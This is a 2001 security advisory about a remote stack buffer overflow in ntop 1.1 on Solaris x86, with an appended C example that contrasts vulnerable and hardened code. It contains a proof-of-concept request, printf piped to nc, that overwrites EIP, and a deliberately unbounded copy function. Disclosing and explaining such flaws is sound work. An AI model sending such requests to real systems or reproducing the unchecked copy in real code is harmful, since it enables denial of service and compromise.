
alt3kx-advisories-2001-002.txt

Date: 25 Aug 2001
Reported by: Alt3kx
Type: packetstorm
Source: packetstormsecurity.com

Remote buffer overflow in NTOP on Solaris_x86 allows privilege escalation via port 8080.

Code
`======================================================================  
  
Remote Buffer Overflow Under Solaris_x86  
NTOP - Network Monitor vulnerable to system compromise  
  
  
  
Author: alt3kx! <alt3kx@@raza-mexicana.org>  
Alternative: <[email protected]>  
Date: 2001-05-23  
Site: www.raza-mexicana.org  
  
  
Greet to: _0x90_, Dex, PaTa , Rebel and S0r from AR & Spain  
Teams: Raregazz - X-ploit and S0d  
  
  
in special to White-B  
  
======================================================================  
------------------------=[Brief Description]=-------------------------  
  
A stack buffer overflow is triggered by an over-long request path sent to  
the port on which the ntop daemon listens (port 8080 in this case); in the  
proof of concept below a 246-character path is enough, around 300 is more  
than plenty. The daemon runs as root (the binary is also installed setuid),  
so anyone who can reach that port, locally or remotely, gains control of the  
saved return address (EIP = 0x41414141 in the core dump below) and can  
execute code with the daemon's privileges.  
  
  
--------------------------=[Platforms]=--------------------------  
  
  
Sun Solaris 7.0_x86  
Sun Solaris 2.6_x86  
  
  
---------------------------=[Summary]=----------------------------  
  
  
Proof of concept :  
  
# ls -la /opt/ntop/bin/ntop  
-rwsr-xr-x 1 bin bin 249680 May 3 1999 /opt/ntop/bin/ntop  
#  
  
  
Step one:  
  
Run the ntop daemon as root:  
  
# /opt/ntop/bin/ntop -w 8080  
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.  
Copyright 1998-99 by Luca Deri <[email protected]>  
Warning: unable to read file '.ntop'. No security will be used!  
Waiting for HTTP connections on port 8080...  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
.  
.  
.  
.  
.  
  
  
  
Step two:  
  
Run the following as a normal (unprivileged) user:  
  
  
[local]:alt3kx# printf "GET /`perl -e 'print "A"x245'`\r\n\r\n" |nc localhost 8080  
HTTP/1.0 200 OK  
Server: ntop/1.1 (i386-pc-solaris2.7)  
Content-type: text/html  
  
<HTML>  
<HEAD>  
<META HTTP-EQUIV=REFRESH CONTENT=120>  
</HEAD>  
<BODY BGCOLOR=#FFFFFF>  
<P><H1><FONT FACE=Helvetica>Unable to find information related to   
host<i>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>  
</HEAD>  
<BODY BGCOLOR=#FFFFFF>  
FRESH   
CONTENT=AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</i></FONT></H1>  
</CENTER>  
  
</CENTER><hr><FONT FACE=Helvetica><H5>Generated by <A   
HREF="http://www-serra.unipi.it/~ntop/">ntop</A> v.1.1 MT   
[i386-pc-solaris2.7] listening on elxl0<br>  
<address>&copy; 1998-99 by <A HREF=mailto:[email protected]>L.   
Deri</A></H5></font></BODY></HTML>  
[local]:alt3kx#  
  
No luck with 245 A's; again with one more A :-)  
  
  
  
[local]:alt3kx# printf "GET /`perl -e 'print "A"x246'`\r\n\r\n" |nc localhost 8080  
[local]:alt3kx#  
  
  
  
  
In the other shell, where ntop is running, you see this:  
  
# /opt/ntop/bin/ntop -w 8080  
ntop v.1.1 MT [i386-pc-solaris2.7] listening on elxl0.  
Copyright 1998-99 by Luca Deri <[email protected]>  
Warning: unable to read file '.ntop'. No security will be used!  
Waiting for HTTP connections on port 8080...  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
[66] [42] 00:80:24:5A:CB:B7 sap 42 > 01:80:C2:00:00:00  
Segmentation Fault(coredump)  
#  
  
[local]:alt3kx# gdb ntop --core=core  
GNU gdb 4.17  
Copyright 1998 Free Software Foundation, Inc.  
GDB is free software, covered by the GNU General Public License, and you are  
welcome to change it and/or distribute copies of it under certain   
conditions.  
Type "show copying" to see the conditions.  
There is absolutely no warranty for GDB. Type "show warranty" for details.  
This GDB was configured as "i386-pc-solaris2.7"...  
Core was generated by `ntop'.  
Program terminated with signal 11, Segmentation Fault.  
Reading symbols from /lib/libsocket.so.1...done.  
Reading symbols from /lib/libnsl.so.1...done.  
Reading symbols from /lib/libgen.so.1...done.  
Reading symbols from /lib/libc.so.1...done.  
Reading symbols from /lib/libdl.so.1...done.  
Reading symbols from /lib/libmp.so.2...done.  
#0 0x41414141 in ?? ()  
  
(gdb) info all-registers  
eax 0x1 1  
ecx 0xdffe19c8 -536995384  
edx 0x20a 522  
ebx 0x80cef44 135065412  
esp 0x8046f14 0x8046f14  
ebp 0x41414141 0x41414141  
esi 0xc8 200  
edi 0x80980f5 134840565  
eip 0x41414141 0x41414141  
eflags 0x10206 66054  
cs 0x17 23  
ss 0x1f 31  
ds 0x1f 31  
es 0x1f 31  
fs 0x0 0  
gs 0x0 0  
(gdb)  
  
  
[local]:alt3kx# truss /opt/ntop/bin/ntop  
  
  
  
open("/dev/zero", O_RDONLY) = 3  
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =   
0xDFFE1000  
sysconfig(_CONFIG_PAGESIZE) = 4096  
open("./libsocket.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libsocket.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFDF000  
mmap(0x00000000, 40960, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFFD4000  
mmap(0xDFFDC000, 5712, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 28672) = 0xDFFDC000  
close(4) = 0  
  
open("./libnsl.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libnsl.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
mmap(0x00000000, 503808, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =   
0xDFF58000  
mmap(0xDFFC5000, 23248, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 442368) = 0xDFFC5000  
mmap(0xDFFCB000, 29472, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFFCB000  
close(4) = 0  
open("./libgen.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libgen.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
mmap(0x00000000, 32768, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFF4F000  
mmap(0xDFF55000, 4184, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 20480) = 0xDFF55000  
close(4) = 0  
open("./libc.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libc.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
mmap(0x00000000, 593920, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) =   
0xDFEBD000  
mmap(0xDFF46000, 25448, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 557056) = 0xDFF46000  
mmap(0xDFF4D000, 3316, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 3, 0) = 0xDFF4D000  
close(4) = 0  
open("./libdl.so.1", O_RDONLY) Err#2 ENOENT  
open("/lib/libdl.so.1", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0xDFFDF000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 4, 0) =   
0xDFFDF000  
close(4) = 0  
open("./libmp.so.2", O_RDONLY) Err#2 ENOENT  
open("/lib/libmp.so.2", O_RDONLY) = 4  
fxstat(2, 4, 0x08047138) = 0  
mmap(0x00000000, 4096, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEBB000  
mmap(0x00000000, 16384, PROT_READ|PROT_EXEC, MAP_PRIVATE, 4, 0) = 0xDFEB6000  
mmap(0xDFEB9000, 2524, PROT_READ|PROT_WRITE|PROT_EXEC,   
MAP_PRIVATE|MAP_FIXED, 4, 8192) = 0xDFEB9000  
mmap(0x00000000, 4096, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE, 3, 0) =   
0xDFEB4000  
close(4) = 0  
close(3) = 0  
  
  
[...............]  
  
  
door_info(3, 0x08044528) = 0  
door_call(3, 0x08044510) = 0  
door_info(3, 0x080465E0) = 0  
door_call(3, 0x080465C8) = 0  
door_info(3, 0x080465E0) = 0  
door_call(3, 0x080465C8) = 0  
door_info(3, 0x080465E0) = 0  
door_call(3, 0x080465C8) = 0  
Incurred fault #6, FLTBOUNDS %pc = 0x41414141  
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141  
Received signal #11, SIGSEGV [default]  
siginfo: SIGSEGV SEGV_MAPERR addr=0x41414141  
*** process killed ***  
  
  
  
bug discovered by alt3kx! <[email protected]> &   
<[email protected]>  
  
  
Possible c0de coming soon .... heh :-)  
  
  
---------------------------=[PATCH]=-----------------------------  
  
Download the latest packages from Sun Microsystems.  
  
-------------------------=[Vendor Information]=-------------------  
  
http://www.sun.com  
http://www.ntop.org  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
  
`
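The crash pattern in the advisory (EBP and EIP both 0x41414141 as soon as the path grows from 245 to 246 bytes) is the signature of a request path copied into a fixed-size stack buffer with no length check. The C program below is an added illustration of that bug class; it is not ntop's source and not the advisory author's code. The handler names, the 128-byte HOSTBUF and the probe-building helper are assumptions, and ntop's real buffer is evidently larger, since the advisory needs a 246-byte path to reach the return address. It builds the same `GET /AAAA...\r\n\r\n` probe the advisory sends with printf and nc, then shows the unbounded copy next to a bounded one that rejects over-long paths before touching the buffer.

```c
/*
 * Added illustration of the bug class in the alt3kx ntop 1.1 advisory:
 * a request path copied into a fixed-size stack buffer with no bound check.
 * NOT ntop's source. HOSTBUF (128), the function names and the request
 * helper are assumptions made for this example.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define HOSTBUF 128                 /* assumed size, not ntop's */
#define PROBE_PREFIX "GET /"
#define PROBE_SUFFIX "\r\n\r\n"

/* Build the probe the advisory sends with printf | nc:
 * "GET /" + n x 'A' + "\r\n\r\n". Caller frees the result. */
char *build_probe(size_t n)
{
    size_t pre = strlen(PROBE_PREFIX), suf = strlen(PROBE_SUFFIX);
    char *req = malloc(pre + n + suf + 1);
    if (!req)
        return NULL;
    memcpy(req, PROBE_PREFIX, pre);
    memset(req + pre, 'A', n);
    memcpy(req + pre + n, PROBE_SUFFIX, suf + 1);   /* includes the NUL */
    return req;
}

/* Locate the path token of a GET request line: the bytes after "GET " up
 * to the first space, CR or LF. Returns NULL if the line is not a GET. */
static const char *request_path(const char *req, size_t *pathlen)
{
    if (strncmp(req, "GET ", 4) != 0)
        return NULL;
    const char *p = req + 4;
    *pathlen = strcspn(p, " \r\n");
    return p;
}

/* VULNERABLE pattern: host[] is on the stack and the copy length comes
 * straight from the request. A 246-byte path runs past host[], over the
 * saved frame pointer and the return address, which is what the advisory's
 * ebp=0x41414141 / eip=0x41414141 shows. Shown for contrast only; call it
 * only with a path that fits in HOSTBUF. */
int lookup_host_vulnerable(const char *req)
{
    char host[HOSTBUF];
    size_t n;
    const char *p = request_path(req, &n);
    if (!p || n == 0)
        return -1;
    memcpy(host, p + 1, n - 1);     /* BUG: n never checked against sizeof host */
    host[n - 1] = '\0';
    return (int)strlen(host);
}

/* HARDENED version: caller supplies the buffer and its size, and the
 * length is checked before anything is copied. Returns the host length,
 * -1 for a malformed request, -2 for a path that does not fit (a real
 * server would answer 414 Request-URI Too Long instead of crashing). */
int lookup_host_hardened(const char *req, char *host, size_t hostsz)
{
    size_t n;
    const char *p = request_path(req, &n);
    if (!p || n == 0 || p[0] != '/')
        return -1;
    size_t hostlen = n - 1;          /* drop the leading '/' */
    if (hostlen >= hostsz)           /* leave room for the terminator */
        return -2;
    memcpy(host, p + 1, hostlen);
    host[hostlen] = '\0';
    return (int)hostlen;
}

/* Run the hardened handler on an n-byte probe with a HOSTBUF-sized
 * buffer and return its result code. */
int hardened_probe_result(size_t n)
{
    char host[HOSTBUF];
    char *req = build_probe(n);
    if (!req)
        return -1;
    int rc = lookup_host_hardened(req, host, sizeof host);
    free(req);
    return rc;
}

int main(void)
{
    size_t lens[] = { 10, 245, 246 };   /* the advisory's lengths plus one that fits */
    for (size_t i = 0; i < sizeof lens / sizeof lens[0]; i++) {
        int rc = hardened_probe_result(lens[i]);
        printf("%3zu x 'A': hardened handler %s (rc=%d)\n", lens[i],
               rc == -2 ? "rejects the path" : "accepts the path", rc);
    }
    char *small = build_probe(10);      /* safe: 10 < HOSTBUF */
    printf(" 10 x 'A': vulnerable handler copied %d bytes\n",
           lookup_host_vulnerable(small));
    free(small);
    return 0;
}
```

With the assumed 128-byte buffer the hardened handler accepts paths up to 127 bytes and returns -2 for the 245- and 246-byte probes, so the same input that gives the advisory EIP = 0x41414141 becomes a rejected request. The length check must compare against the destination size before the copy, not after; checking `strlen(host)` afterwards, as code of that era often did, is too late.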
